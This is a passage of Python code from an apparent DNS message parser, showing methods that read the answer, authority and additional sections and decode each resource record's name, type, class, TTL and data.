self._byte_index, parsed_question = Question.from_bytes(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_offset=self._byte_index)
self._parsed_message.questions.append(parsed_question)
def _parse_answer_section(self) -> None:
for _ in range(self._an_count):
parsed_rr = self._parse_resource_record()
self._parsed_message.answers_RRs.append(parsed_rr)
def _parse_authority_section(self) -> None:
for _ in range(self._ns_count):
parsed_rr = self._parse_resource_record()
self._parsed_message.authority_RRs.append(parsed_rr)
def _parse_additional_section(self) -> None:
for _ in range(self._ar_count):
parsed_rr = self._parse_resource_record()
self._parsed_message.additional_RRs.append(parsed_rr)
def _parse_resource_record(self) -> ResourceRecord:
# parse name of the resource record
self._byte_index, rr_name = parse_name(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_index=self._byte_index)
self._byte_index, rr_type = RRType.from_bytes(raw_bits=self._message_in_bits, byte_offset=self._byte_index)
self._byte_index, rr_class = RRClass.from_bytes(raw_bits=self._message_in_bits, byte_offset=self._byte_index)
# parse the time to live of the resource record
rr_ttl = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=self._byte_index, bit_offset=0, number_of_bits=32)
self._byte_index += 4
# parse the data of the resource record
rr_data_length = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=self._byte_index, bit_offset=0, number_of_bits=16)
self._byte_index += 2
record_class = RR_TYPE_TO_CLASS_MAPPING.get(rr_type, None)
if record_class is None:
raw_data = self._message_in_bytes[self._byte_index: self._byte_index + rr_data_length]
record = UnparsedResourceRecord(name=rr_name, rr_class=rr_class, ttl=rr_ttl, rr_type=rr_type, raw_data=raw_data)
else:
record = record_class.from_bytes(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_offset=self._byte_index,
rr_data_length=rr_data_length, name=rr_name, rr_class=rr_class, ttl=rr_ttl)
self._byte_index += rr_data_length
return record
| 1.4375 | 1 |